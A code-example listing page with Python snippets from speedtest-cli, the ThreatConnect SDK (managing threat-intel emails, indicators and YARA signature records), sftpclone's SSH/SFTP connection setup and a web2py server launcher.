        name, ext = os.path.splitext(args.mini)
        if ext:
            url = os.path.dirname(args.mini)
        else:
            url = args.mini
        urlparts = urlparse(url)
        try:
            request = build_request(args.mini)
            f = urlopen(request)
        except:
            print_('Invalid Speedtest Mini URL')
            sys.exit(1)
        else:
            text = f.read()
            f.close()
        extension = re.findall('upload_extension: "([^"]+)"', text.decode())
        if not extension:
            for ext in ['php', 'asp', 'aspx', 'jsp']:
                try:
                    request = build_request('%s/speedtest/upload.%s' %
                                            (args.mini, ext))
                    f = urlopen(request)
                except:
                    pass
                else:
                    data = f.read().strip()
                    if (f.code == 200 and
                            len(data.splitlines()) == 1 and
                            re.match('size=[0-9]', data)):
                        extension = [ext]
                        break
        if not urlparts or not extension:
            print_('Please provide the full URL of your Speedtest Mini server')
            sys.exit(1)
        servers = [{
            'sponsor': 'Speedtest Mini',
            'name': urlparts[1],
            'd': 0,
            'url': '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
            'latency': 0,
            'id': 0
        }]
        try:
            best = getBestServer(servers)
        except:
            best = servers[0]
    else:
        if not args.simple:
            print_('Selecting best server based on latency...')
        best = getBestServer(servers)

    if not args.simple:
        print_(('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
               '%(latency)s ms' % best).encode('utf-8', 'ignore'))
    else:
        print_('Ping: %(latency)s ms' % best)

    sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
    urls = []
    for size in sizes:
        for i in range(0, 4):
            urls.append('%s/random%sx%s.jpg' %
                        (os.path.dirname(best['url']), size, size))
    if not args.simple:
        print_('Testing download speed', end='')
    dlspeed = downloadSpeed(urls, args.simple)
    if not args.simple:
        print_()
    print_('Download: %0.2f M%s/s' %
           ((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))

    sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
    sizes = []
    for size in sizesizes:
        for i in range(0, 25):
            sizes.append(size)
    if not args.simple:
        print_('Testing upload speed', end='')
    ulspeed = uploadSpeed(best['url'], sizes, args.simple)
    if not args.simple:
        print_()
    print_('Upload: %0.2f M%s/s' %
           ((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))

    if args.share and args.mini:
        print_('Cannot generate a speedtest.net share results image while '
               'testing against a Speedtest Mini server')
    elif args.share:
        dlspeedk = int(round((dlspeed / 1000) * 8, 0))
        ping = int(round(best['latency'], 0))
        ulspeedk = int(round((ulspeed / 1000) * 8, 0))

        # Build the request to send results back to speedtest.net
        # We use a list instead of a dict because the API expects parameters
        # in a certain order
        apiData = [
            'download=%s' % dlspeedk,
            'ping=%s' % ping,
            'upload=%s' % ulspeedk,
            'promo=',
            'startmode=%s' % 'pingselect',
            'recommendedserverid=%s' % best['id'],
            'accuracy=%s' % 1,
            'serverid=%s' % best['id'],
            'hash=%s' % md5(('%s-%s-%s-%s' %
                             (ping, ulspeedk, dlspeedk, '297aae72'))
                            .encode()).hexdigest()]

        headers = {'Referer': 'http://c.speedtest.net/flash/speedtest.swf'}
        request = build_request('://www.speedtest.net/api/api.php',
                                data='&'.join(apiData).encode(),
                                headers=headers)
        f, e = catch_request(request)
        if e:
            print_('Could not submit results to speedtest.net: %s' % e)
            sys.exit(1)
        response = f.read()
        code = f.code
        f.close()

        if int(code) != 200:
            print_('Could not submit results to speedtest.net')
            sys.exit(1)

        qsargs = parse_qs(response.decode())
        resultid = qsargs.get('resultid')
        if not resultid or len(resultid) != 1:
            print_('Could not submit results to speedtest.net')
            sys.exit(1)

        print_('Share results: %s://www.speedtest.net/result/%s.png' %
               (scheme, resultid[0]))

Example 12

View license
def main():
    """ """
    # (Optional) SET THREAT CONNECT LOG (TCL) LEVEL
    tc.set_tcl_file('log/tc.log', 'debug')
    tc.set_tcl_console_level('critical')

    # (Required) Instantiate a Resource Object
    resources = tc.emails()

    #
    # (Optional) retrieve results from API and update selected resource in loop
    #

    # filters can be set to limit search results
    try:
        filter1 = resources.add_filter()
        filter1.add_owner(owner)  # filter on owner
    except AttributeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    try:
        resources.retrieve()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    for res in resources:

        # a particular resource can be matched by ID, Name or any other supported attribute
        if res.id == lu_id:
            #
            # once a resource is matched any metadata on that resource can be updated
            #
            res.set_name('LU Email #{0:d}'.format(rn))
            res.set_body('This is an email body #{0:d}.'.format(rn))
            res.set_header('This is an email header #{0:d}.'.format(rn))
            res.set_subject('This is an email subject #{0:d}.'.format(rn))
            res.set_from_address('adversary_{0:d}@badguys.com'.format(rn))
            res.set_to('victim_{0:d}@goodguys.com'.format(rn))

            #
            # working with indicator associations
            #

            # existing indicator associations can be retrieved and iterated through
            for association in res.indicator_associations:
                # add delete flag to all indicator association that have a confidence under 10
                if association.confidence < 10:
                    res.disassociate_indicator(association.resource_type, association.indicator)

            # indicator associations can be added to a resource by providing the resource type and value
            res.associate_indicator(ResourceType.ADDRESSES, ip_address)

            #
            # working with group associations
            #

            # existing group associations can be retrieved and iterated through
            for association in res.group_associations:
                # add delete flag to all group association that match DELETE
                if re.findall('LU', association.name):
                    res.disassociate_group(association.resource_type, association.id)

            # group associations can be added to a resource by providing the resource type and id
            res.associate_group(ResourceType.ADVERSARIES, adversary_id)

            #
            # working with victim associations
            #

            # existing victim associations can be retrieved and iterated through
            for association in res.victim_associations:
                # add delete flag to all group association that match DELETE
                if re.findall('LU', association.name):
                    res.disassociate_victim(association.id)

            # victim associations can be added to a resource by providing the resource id
            res.associate_victim(victim_id)

            #
            # working with attributes
            #

            # existing attributes can be loaded into the resource and iterated through
            res.load_attributes()
            for attribute in res.attributes:
                # add delete flag to all attributes that have 'test' in the value.
                if re.findall('test', attribute.value):
                    res.delete_attribute(attribute.id)
                # add update flag to all attributes that have 'update' in the value.
                if re.findall('update', attribute.value):
                    res.update_attribute(attribute.id, 'updated attribute #{0:d}'.format(rn))

            # attributes can be added to a resource by providing the attribute type and value
            res.add_attribute('Description', 'test attribute #{0:d}'.format(rn))

            #
            # working with tags
            #

            # existing tags can be loaded into the resource and iterated through
            res.load_tags()
            for tag in res.tags:
                # add delete flag to all tags that have 'DELETE' in the name.
                if re.findall('DELETE', tag.name):
                    res.delete_tag(tag.name)

            # tags can be added to a resource by providing the tags value
            res.add_tag('DELETE #{0:d}'.format(rn))

            # (Required) commit this resource
            try:
                print('Updating resource {0!s}.'.format(res.name))
                res.commit()
            except RuntimeError as e:
                print('Error: {0!s}'.format(e))
                sys.exit(1)

        #
        # (Optional) delete resource if required
        #

        # delete to any resource that has 'DELETE' in the name.
        elif re.findall('DELETE', res.name):
            try:
                print('Deleting resource {0!s}.'.format(res.name))
                res.delete()  # this action is equivalent to commit
            except RuntimeError as e:
                print('Error: {0!s}'.format(e))
                sys.exit(1)

    #
    # (Optional) ADD RESOURCE EXAMPLE
    #

    # new resources can be added with the resource add method
    resource = resources.add('DELETE #{0:d}'.format(rn), owner)

    # additional properties can be added
    resource.set_body('This is an email body #{0:d}.'.format(rn))
    resource.set_from_address('bad_guy_{0:d}@badguys.com'.format(rn))
    resource.set_header('This is an email header #{0:d}.'.format(rn))
    resource.set_subject('This is an email subject #{0:d}.'.format(rn))
    resource.set_to('victim{0:d}@goodguys.com'.format(rn))

    # attributes can be added to the new resource
    resource.add_attribute('Description', 'Delete Example #{0:d}'.format(rn))

    # tags can be added to the new resource
    resource.add_tag('TAG #{0:d}'.format(rn))

    # the security label can be set on the new resource
    resource.set_security_label('TLP Green')

    # commit this resource and add attributes, tags and security labels
    try:
        print('Adding resource {0!s}.'.format(resource.name))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # (Optional) UPDATE RESOURCE EXAMPLE
    #

    # existing resources can also be updated with the resource add method
    resource = resources.add('MU Email #{0:d}'.format(rn), owner)  # this will overwrite exising resource name
    resource.set_id(mu_id)  # set the id to the existing resource

    # additional properties can be updated
    resource.set_body('This is an updated email body #{0:d}.'.format(rn))
    resource.set_from_address('bad_guy_update{0:d}@badguys.com'.format(rn))
    resource.set_header('This is an updated email header #{0:d}.'.format(rn))
    resource.set_subject('This is an updated email subject #{0:d}.'.format(rn))
    resource.set_to('victim_update{0:d}@goodguys.com'.format(rn))

    # existing attributes can be loaded for modification or deletion
    resource.load_attributes()
    for attribute in resource.attributes:
        if attribute.type == 'Description':
            resource.delete_attribute(attribute.id)

    # attributes can be added to the existing resource
    resource.add_attribute('Description', 'Manual Update Example #{0:d}'.format(rn))

    # existing tags can be loaded for modification or deletion
    resource.load_tags()
    for tag in resource.tags:
        resource.delete_tag(tag.name)

    # tags can be added to the existing resource
    resource.add_tag('TAG #{0:d}'.format(rn))

    # commit this resource and add attributes, tags and security labels
    try:
        print('Updating resource {0!s}.'.format(resource.name))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # (Optional) DELETE RESOURCE EXAMPLE
    #

    # resources can be deleted with the resource add method
    # resource = resources.add(''.format(rn), owner)  # a valid resource name is not required
    # resource.set_id(dl_id)
    #
    # # delete this resource
    # try:
    #     resource.delete()
    # except RuntimeError as e:
    #     print(e)

    # (Optional) DISPLAY A COMMIT REPORT
    print(tc.report.stats)

    # display any failed api calls
    for fail in tc.report.failures:
        print(fail)

Example 13

View license
def main():
    """ """
    # set threat connect log (tcl) level
    tc.set_tcl_file('log/tc.log', 'debug')
    tc.set_tcl_console_level('critical')
    tc.report_enable()

    # (Required) Instantiate a Resource Object
    resources = tc.indicators()

    # (Optional) Filters can be added here if required to narrow the result set.
    try:
        filter1 = resources.add_filter()
        filter1.add_owner(owner)
    except AttributeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    # (Optional) retrieve all results
    try:
        resources.retrieve()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    # (Optional) iterate through all results if retrieve was used above
    for res in resources:

        # (Optional) match a particular resource by ID, Name or any other supported attribute.
        if lu_indicator == res.indicator or lu_indicator in res.indicator:
            #
            # update resource if required
            #
            res.set_confidence(rn)
            res.set_rating(randint(0, 5))
            res.set_description('Test Description {0:d}'.format(randint(0, 5)))
            res.delete_security_label('TLP Red')
            res.set_security_label('TLP Red')

            #
            # working with indicator associations
            #

            # indicator to indicator associations can be retrieved, but NOT directly associated,

            #
            # working with group associations
            #

            # (Optional) get all group associations
            for association in res.group_associations:
                # add delete flag to all group association that match DELETE
                if re.findall('Loop', association.name):
                    res.disassociate_group(association.resource_type, association.id)

            res.associate_group(ResourceType.ADVERSARIES, adversary_id)

            #
            # working with victim associations
            #

            # (Optional) get all victim associations
            # resources.victim_associations(res)
            # for association in res.association_objects_victims:
            #     print(association)

            #
            # working with attributes
            #
            # (Optional) get all attributes associated with this resource
            res.load_attributes()
            for attribute in res.attributes:
                # add delete flag to all attributes that have 'test' in the value.
                if re.findall('DELETE', attribute.value):
                    res.delete_attribute(attribute.id)
                # add update flag to all attributes that have 'update' in the value.
                if attribute.type == 'Source' and re.findall('UPDATE', attribute.value):
                    res.update_attribute(attribute.id, 'UPDATE Test Attribute %s' % rn)
            # (Optional) add attribute to resource with type and value
            res.add_attribute('Additional Analysis and Context', 'DELETE Test Attribute %s' % rn)

            #
            # working with tags
            #

            # (Optional) get all tags associated with this resource
            res.load_tags()
            for tag in res.tags:
                # add delete flag to all tags that have 'DELETE' in the name.
                if re.findall('DELETE', tag.name):
                    res.delete_tag(tag.name)
            # (Optional) add tag to resource
            res.add_tag('DELETE {0:d}'.format(rn))
            res.add_tag('EXAMPLE')

            # commit changes
            try:
                print('Updating resource {0!s}.'.format(res.indicator))
                res.commit()
            except RuntimeError as e:
                print('Error: {0!s}'.format(e))
                sys.exit(1)

        #
        # delete resource
        #

        # (Optional) add delete flag to previously created indicators
        if isinstance(res.indicator, dict):
            for k, v in res.indicator.items():
                if v is not None and re.findall(prefixes['file'], v):
                    print('Delete resource {0!s}.'.format(res.indicator))
                    res.delete()
                    break
        else:
            for k, v in prefixes.items():
                if re.findall(v, res.indicator):
                    print('Delete resource {0!s}.'.format(res.indicator))
                    res.delete()
                    break

    #
    # add address indicator
    #

    # this requires that the resource was instantiated at the beginning of the script.
    resource = resources.add('4.3.254.{0:d}'.format(rn), owner)
    resource.set_confidence(rn)
    resource.set_rating(randint(1, 5))

    # (Optional) add attribute to newly created resource
    resource.add_attribute('Description', 'TEST attribute #{0:d}'.format(rn))

    # (Optional) add tag to newly created resource
    resource.add_tag('TAG #{0:d}'.format(rn))
    resource.add_tag('EXAMPLE')

    # (Optional) set security label to newly created resource
    resource.set_security_label('TLP Green')

    try:
        print('Adding resource {0!s}.'.format(resource.indicator))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # add email address indicator
    #

    # this requires that the resource was instantiated at the beginning of the script.
    resource = resources.add('{0!s}_{1!s}@badguysareus.com'.format(prefixes['email'], str(rn).zfill(3)), owner)
    resource.set_confidence(rn)
    resource.set_rating(randint(1, 5))

    # (Optional) add attribute to newly created resource
    resource.add_attribute('Description', 'TEST attribute #{0:d}'.format(rn))

    # (Optional) add tag to newly created resource
    resource.add_tag('TAG #{0:d}'.format(rn))
    resource.add_tag('EXAMPLE')

    # (Optional) set security label to newly created resource
    resource.set_security_label('TLP Green')

    try:
        print('Adding resource {0!s}.'.format(resource.indicator))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # add file indicator
    #

    # this requires that the resource was instantiated at the beginning of the script.
    resource = resources.add('{0!s}1ba81f1dc6d3637589ffa04366{1!s}'.format(
        prefixes['file'], str(rn).zfill(3)), owner)
    resource.set_indicator('{0!s}530f8e0104d4521958309eb9852e073150{1!s}'.format(
        prefixes['file'], str(rn).zfill(3)))
    resource.set_indicator('{0!s}10a665da94445f5b505c828d532886541900373d29042cc46c3300a186{1!s}'.format(
        prefixes['file'], str(rn).zfill(3)))

    resource.set_confidence(rn)
    resource.set_rating(randint(1, 5))
    resource.set_size(rn)
    fo_date = (datetime.isoformat(datetime(2015, randint(1, 12), randint(1, 29)))) + 'Z'
    resource.add_file_occurrence('badfile_{0!s}.exe'.format(rn), 'C:\windows', fo_date)

    # (Optional) add attribute to newly created resource
    resource.add_attribute('Description', 'TEST attribute #{0:d}'.format(rn))

    # (Optional) add tag to newly created resource
    resource.add_tag('TAG #{0:d}'.format(rn))
    resource.add_tag('EXAMPLE')

    # (Optional) set security label to newly created resource
    resource.set_security_label('TLP Green')

    try:
        print('Adding resource {0!s}.'.format(resource.indicator))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # add host indicator
    #

    # this requires that the resource was instantiated at the beginning of the script.
    resource = resources.add('{0!s}_{1!s}.com'.format(prefixes['host'], str(rn).zfill(3)), owner)

    resource.set_confidence(rn)
    resource.set_rating(randint(1, 5))

    # (Optional) add attribute to newly created resource
    resource.add_attribute('Description', 'TEST attribute #{0:d}'.format(rn))

    # (Optional) add tag to newly created resource
    resource.add_tag('TAG #{0:d}'.format(rn))
    resource.add_tag('EXAMPLE')

    # (Optional) set security label to newly created resource
    resource.set_security_label('TLP Green')

    # (Optional) set resource as false positive
    resource.add_false_positive()

    try:
        print('Adding resource {0!s}.'.format(resource.indicator))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # add url indicator
    #

    # this requires that the resource was instantiated at the beginning of the script.
    resource = resources.add('{0!s}_{1!s}.com/clickme.html'.format(
        prefixes['url'], str(rn).zfill(3)), owner)

    resource.set_confidence(rn)
    resource.set_rating(randint(1, 5))

    # (Optional) add attribute to newly created resource
    resource.add_attribute('Description', 'TEST attribute #{0:d}'.format(rn))

    # (Optional) add tag to newly created resource
    resource.add_tag('TAG #{0:d}'.format(rn))
    resource.add_tag('EXAMPLE')

    # (Optional) set security label to newly created resource
    resource.set_security_label('TLP Green')

    try:
        print('Adding resource {0!s}.'.format(resource.indicator))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    # (Optional) display a commit report of all API actions performed
    print(tc.report.stats)

    # display any failed api calls
    for fail in tc.report.failures:
        print(fail)

Example 14

View license
def main():
    """ """
    # (Optional) SET THREAT CONNECT LOG (TCL) LEVEL
    tc.set_tcl_file('log/tc.log', 'debug')
    tc.set_tcl_console_level('critical')

    # (Required) Instantiate a Resource Object
    resources = tc.signatures()

    #
    # (Optional) retrieve results from API and update selected resource in loop
    #

    # filters can be set to limit search results
    try:
        filter1 = resources.add_filter()
        filter1.add_owner(owner)  # filter on owner
    except AttributeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    try:
        resources.retrieve()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    for res in resources:

        # a particular resource can be matched by ID, Name or any other supported attribute
        if res.id == lu_id:
            #
            # once a resource is matched any metadata on that resource can be updated
            #
            res.set_name('LU Signature #{0:d}'.format(rn))

            # existing field can be updated
            res.set_file_name('loop update {0:d}.yara'.format(rn))
            res.set_file_type('YARA')
            file_text = '"' + str(rn) + ' rule example_sig : example\n{\n'
            file_text += 'meta:\n        description = "This '
            file_text += 'is just an example"\n\n '
            file_text += 'strings:\n        $a = {6A 40 68 00 '
            file_text += '30 00 00 6A 14 8D 91}\n        $b = '
            file_text += '{8D 4D B0 2B C1 83 C0 27 99 6A 4E '
            file_text += '59 F7 F9}\n    condition:\n '
            file_text += '$a or $b or $c\n}"'
            res.set_file_text(file_text)

            #
            # working with indicator associations
            #

            # existing indicator associations can be retrieved and iterated through
            for association in res.indicator_associations:
                # add delete flag to all indicator association that have a confidence under 10
                if association.confidence < 10:
                    res.disassociate_indicator(association.resource_type, association.indicator)

            # indicator associations can be added to a resource by providing the resource type and value
            res.associate_indicator(ResourceType.ADDRESSES, ip_address)

            #
            # working with group associations
            #

            # existing group associations can be retrieved and iterated through
            for association in res.group_associations:
                # add delete flag to all group association that match DELETE
                if re.findall('LU', association.name):
                    res.disassociate_group(association.resource_type, association.id)

            # group associations can be added to a resource by providing the resource type and id
            res.associate_group(ResourceType.ADVERSARIES, adversary_id)

            #
            # working with victim associations
            #

            # existing victim associations can be retrieved and iterated through
            for association in res.victim_associations:
                # add delete flag to all group association that match DELETE
                if re.findall('LU', association.name):
                    res.disassociate_victim(association.id)

            # victim associations can be added to a resource by providing the resource id
            res.associate_victim(victim_id)

            #
            # working with attributes
            #

            # existing attributes can be loaded into the resource and iterated through
            res.load_attributes()
            for attribute in res.attributes:
                # add delete flag to all attributes that have 'test' in the value.
                if re.findall('test', attribute.value):
                    res.delete_attribute(attribute.id)
                # add update flag to all attributes that have 'update' in the value.
                if re.findall('update', attribute.value):
                    res.update_attribute(attribute.id, 'updated attribute #{0:d}'.format(rn))

            # attributes can be added to a resource by providing the attribute type and value
            res.add_attribute('Description', 'test attribute #{0:d}'.format(rn))

            #
            # working with tags
            #

            # existing tags can be loaded into the resource and iterated through
            res.load_tags()
            for tag in res.tags:
                # add delete flag to all tags that have 'DELETE' in the name.
                if re.findall('DELETE', tag.name):
                    res.delete_tag(tag.name)

            # tags can be added to a resource by providing the tags value
            res.add_tag('DELETE #{0:d}'.format(rn))

            # (Required) commit this resource
            try:
                print('Updating resource {0!s}.'.format(res.name))
                res.commit()
            except RuntimeError as e:
                print('Error: {0!s}'.format(e))
                sys.exit(1)

        #
        # (Optional) delete resource if required
        #

        # delete to any resource that has 'DELETE' in the name.
        elif re.findall('DELETE', res.name):
            try:
                print('Deleting resource {0!s}.'.format(res.name))
                res.delete()  # this action is equivalent to commit
            except RuntimeError as e:
                print('Error: {0!s}'.format(e))
                sys.exit(1)

    #
    # (Optional) ADD RESOURCE EXAMPLE
    #

    # new resources can be added with the resource add method
    resource = resources.add('DELETE #{0:d}'.format(rn), owner)

    # add REQUIRED and optional fields for new resource
    resource.set_file_name('delete {0:d}.txt'.format(rn))
    resource.set_file_type('YARA')
    file_text = '"' + str(rn) + ' rule example_sig : example\n{\n'
    file_text += 'meta:\n        description = "This '
    file_text += 'is just an example"\n\n '
    file_text += 'strings:\n        $a = {6A 40 68 00 '
    file_text += '30 00 00 6A 14 8D 91}\n        $b = '
    file_text += '{8D 4D B0 2B C1 83 C0 27 99 6A 4E '
    file_text += '59 F7 F9}\n    condition:\n '
    file_text += '$a or $b or $c\n}"'
    resource.set_file_text(file_text)

    # attributes can be added to the new resource
    resource.add_attribute('Description', 'Delete Example #{0:d}'.format(rn))

    # tags can be added to the new resource
    resource.add_tag('TAG #{0:d}'.format(rn))

    # the security label can be set on the new resource
    resource.set_security_label('TLP Green')

    # commit this resource and add attributes, tags and security labels
    try:
        print('Adding resource {0!s}.'.format(resource.name))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # (Optional) UPDATE RESOURCE EXAMPLE
    #

    # existing resources can also be updated with the resource add method
    resource = resources.add('MU Signature #{0:d}'.format(rn), owner)  # this will overwrite exising resource name
    resource.set_id(mu_id)  # set the id to the existing resource

    # existing properties can be updated
    resource.set_file_name('manual update {0:d}.txt'.format(rn))
    resource.set_file_type('YARA')
    file_text = '"' + str(rn) + ' rule example_sig : example\n{\n'
    file_text += 'meta:\n        description = "This '
    file_text += 'is just an example"\n\n '
    file_text += 'strings:\n        $a = {6A 40 68 00 '
    file_text += '30 00 00 6A 14 8D 91}\n        $b = '
    file_text += '{8D 4D B0 2B C1 83 C0 27 99 6A 4E '
    file_text += '59 F7 F9}\n    condition:\n '
    file_text += '$a or $b or $c\n}"'
    resource.set_file_text(file_text)

    # existing attributes can be loaded for modification or deletion
    resource.load_attributes()
    for attribute in resource.attributes:
        if attribute.type == 'Description':
            resource.delete_attribute(attribute.id)

    # attributes can be added to the existing resource
    resource.add_attribute('Description', 'Manual Update Example #{0:d}'.format(rn))

    # existing tags can be loaded for modification or deletion
    resource.load_tags()
    for tag in resource.tags:
        resource.delete_tag(tag.name)

    # tags can be added to the existing resource
    resource.add_tag('TAG #{0:d}'.format(rn))

    # commit this resource and add attributes, tags and security labels
    try:
        print('Updating resource {0!s}.'.format(resource.name))
        resource.commit()
    except RuntimeError as e:
        print('Error: {0!s}'.format(e))
        sys.exit(1)

    #
    # (Optional) DELETE RESOURCE EXAMPLE
    #

    # resources can be deleted with the resource add method
    # resource = resources.add(''.format(rn), owner)  # a valid resource name is not required
    # resource.set_id(dl_id)
    #
    # # delete this resource
    # try:
    #     resource.delete()
    # except RuntimeError as e:
    #     print(e)

    # (Optional) DISPLAY A COMMIT REPORT
    print(tc.report.stats)

    # display any failed api calls
    for fail in tc.report.failures:
        print(fail)

Example 15

Project: sftpclone
Source File: sftpclone.py
View license
    def __init__(self, local_path, remote_url,
                 identity_files=None, port=None, fix_symlinks=False,
                 ssh_config_path=None, ssh_agent=False,
                 exclude_file=None, known_hosts_path=None,
                 delete=True, allow_unknown=False
                 ):
        """Init the needed parameters and the SFTPClient."""
        self.local_path = os.path.realpath(os.path.expanduser(local_path))
        self.logger = logger or configure_logging()

        if not os.path.exists(self.local_path):
            self.logger.error("Local path MUST exist. Exiting.")
            sys.exit(1)

        if exclude_file:
            with open(exclude_file) as f:
                # As in rsync's exclude from, ignore lines with leading ; and #
                # and treat each path as relative (thus by removing the leading
                # /)
                exclude_list = [
                    line.rstrip().lstrip("/")
                    for line in f
                    if not line.startswith((";", "#"))
                ]

                # actually, is a set of excluded files
                self.exclude_list = {
                    g
                    for pattern in exclude_list
                    for g in glob.glob(path_join(self.local_path, pattern))
                }
        else:
            self.exclude_list = set()

        username, password, hostname, self.remote_path = parse_username_password_hostname(remote_url)

        identity_files = identity_files or []
        if ssh_config_path:
            try:
                with open(os.path.expanduser(ssh_config_path)) as c_file:
                    ssh_config = paramiko.SSHConfig()
                    ssh_config.parse(c_file)
                    c = ssh_config.lookup(hostname)

                    hostname = c.get("hostname", hostname)
                    username = c.get("user", username)
                    port = int(c.get("port", port))
                    identity_files = c.get("identityfile", identity_files)
            except Exception as e:
                # it could be safe to continue anyway,
                # because parameters could have been manually specified
                self.logger.error(
                    "Error while parsing ssh_config file: %s. Trying to continue anyway...", e
                )

        # Set default values
        if not username:
            username = getuser()  # defaults to current user

        port = port or 22
        allow_unknown = allow_unknown or False

        self.chown = False
        self.fix_symlinks = fix_symlinks or False
        self.delete = delete if delete is not None else True

        agent_keys = list()
        agent = None

        if ssh_agent:
            try:
                agent = paramiko.agent.Agent()
                _agent_keys = agent.get_keys()

                if not _agent_keys:
                    agent.close()
                    self.logger.error(
                        "SSH agent didn't provide any valid key. Trying to continue..."
                    )
                else:
                    agent_keys.append(*_agent_keys)

            except paramiko.SSHException:
                if agent:
                    agent.close()
                self.logger.error(
                    "SSH agent speaks a non-compatible protocol. Ignoring it.")

        if not identity_files and not password and not agent_keys:
            self.logger.error(
                "You need to specify either a password, an identity or to enable the ssh-agent support."
            )
            sys.exit(1)

        # only root can change file owner
        if username == 'root':
            self.chown = True

        try:
            transport = paramiko.Transport((hostname, port))
        except socket.gaierror:
            self.logger.error(
                "Hostname not known. Are you sure you inserted it correctly?")
            sys.exit(1)

        try:
            ssh_host = hostname if port == 22 else "[{}]:{}".format(hostname, port)
            known_hosts = None

            """
            Before starting the transport session, we have to configure it.
            Specifically, we need to configure the preferred PK algorithm.
            If the system already knows a public key of a specific kind for
            a remote host, we have to peek its type as the preferred one.
            """
            if known_hosts_path:
                known_hosts = paramiko.HostKeys()
                known_hosts_path = os.path.realpath(
                    os.path.expanduser(known_hosts_path))

                try:
                    known_hosts.load(known_hosts_path)
                except IOError:
                    self.logger.error(
                        "Error while loading known hosts file at {}. Exiting...".format(
                            known_hosts_path)
                    )
                    sys.exit(1)

                known_keys = known_hosts.lookup(ssh_host)
                if known_keys is not None:
                    # one or more keys are already known
                    # set their type as preferred
                    transport.get_security_options().key_types = \
                        tuple(known_keys.keys())

            transport.start_client()

            if not known_hosts:
                self.logger.warning("Security warning: skipping known hosts check...")
            else:
                pubk = transport.get_remote_server_key()
                if ssh_host in known_hosts.keys():
                    if not known_hosts.check(ssh_host, pubk):
                        self.logger.error(
                            "Security warning: "
                            "remote key fingerprint {} for hostname "
                            "{} didn't match the one in known_hosts {}. "
                            "Exiting...".format(
                                pubk.get_base64(),
                                ssh_host,
                                known_hosts.lookup(hostname),
                            )
                        )
                        sys.exit(1)
                elif not allow_unknown:
                    prompt = ("The authenticity of host '{}' can't be established.\n"
                              "{} key is {}.\n"
                              "Are you sure you want to continue connecting? [y/n] ").format(
                        ssh_host, pubk.get_name(), pubk.get_base64())

                    try:
                        # Renamed to `input` in Python 3.x
                        response = raw_input(prompt)
                    except NameError:
                        response = input(prompt)

                    # Note: we do not modify the user's known_hosts file

                    if not (response == "y" or response == "yes"):
                        self.logger.error(
                            "Host authentication failed."
                        )
                        sys.exit(1)

            def perform_key_auth(pkey):
                try:
                    transport.auth_publickey(
                        username=username,
                        key=pkey
                    )
                    return True
                except paramiko.SSHException:
                    self.logger.warning(
                        "Authentication with identity {}... failed".format(pkey.get_base64()[:10])
                    )
                    return False

            if password:  # Password auth, if specified.
                transport.auth_password(
                    username=username,
                    password=password
                )
            elif agent_keys:  # SSH agent keys have higher priority
                for pkey in agent_keys:
                    if perform_key_auth(pkey):
                        break  # Authentication worked.
                else:  # None of the keys worked.
                    raise paramiko.SSHException
            elif identity_files:  # Then follow identity file (specified from CL or ssh_config)
                # Try identity files one by one, until one works
                for key_path in identity_files:
                    key_path = os.path.expanduser(key_path)

                    try:
                        key = paramiko.RSAKey.from_private_key_file(key_path)
                    except paramiko.PasswordRequiredException:
                        pk_password = getpass(
                            "It seems that your identity from '{}' is encrypted. "
                            "Please enter your password: ".format(key_path)
                        )

                        try:
                            key = paramiko.RSAKey.from_private_key_file(key_path, pk_password)
                        except paramiko.SSHException:
                            self.logger.error(
                                "Incorrect passphrase. Cannot decode private key from '{}'.".format(key_path)
                            )
                            continue
                    except IOError or paramiko.SSHException:
                        self.logger.error(
                            "Something went wrong while opening '{}'. Skipping it.".format(key_path)
                        )
                        continue

                    if perform_key_auth(key):
                        break  # Authentication worked.

                else:  # None of the keys worked.
                    raise paramiko.SSHException
            else:  # No authentication method specified, we shouldn't arrive here.
                assert False
        except paramiko.SSHException:
            self.logger.error(
                "None of the provided authentication methods worked. Exiting."
            )
            transport.close()
            sys.exit(1)
        finally:
            if agent:
                agent.close()

        self.sftp = paramiko.SFTPClient.from_transport(transport)

        if self.remote_path.startswith("~"):
            # nasty hack to let getcwd work without changing dir!
            self.sftp.chdir('.')
            self.remote_path = self.remote_path.replace(
                "~", self.sftp.getcwd())  # home is the initial sftp dir

Example 16

Project: termite-data-server
Source File: widget.py
View license
def start(cron=True):
    """ Start server  """

    # ## get command line arguments

    (options, args) = console()

    if not options.nobanner:
        print ProgramName
        print ProgramAuthor
        print ProgramVersion

    from dal import DRIVERS
    if not options.nobanner:
        print 'Database drivers available: %s' % ', '.join(DRIVERS)

    # ## if -L load options from options.config file
    if options.config:
        try:
            options2 = __import__(options.config, {}, {}, '')
        except Exception:
            try:
                # Jython doesn't like the extra stuff
                options2 = __import__(options.config)
            except Exception:
                print 'Cannot import config file [%s]' % options.config
                sys.exit(1)
        for key in dir(options2):
            if hasattr(options, key):
                setattr(options, key, getattr(options2, key))

    logfile0 = os.path.join('extras','examples','logging.example.conf')
    if not os.path.exists('logging.conf') and os.path.exists(logfile0):
        import shutil
        sys.stdout.write("Copying logging.conf.example to logging.conf ... ")
        shutil.copyfile('logging.example.conf', logfile0)
        sys.stdout.write("OK\n")

    # ## if -T run doctests (no cron)
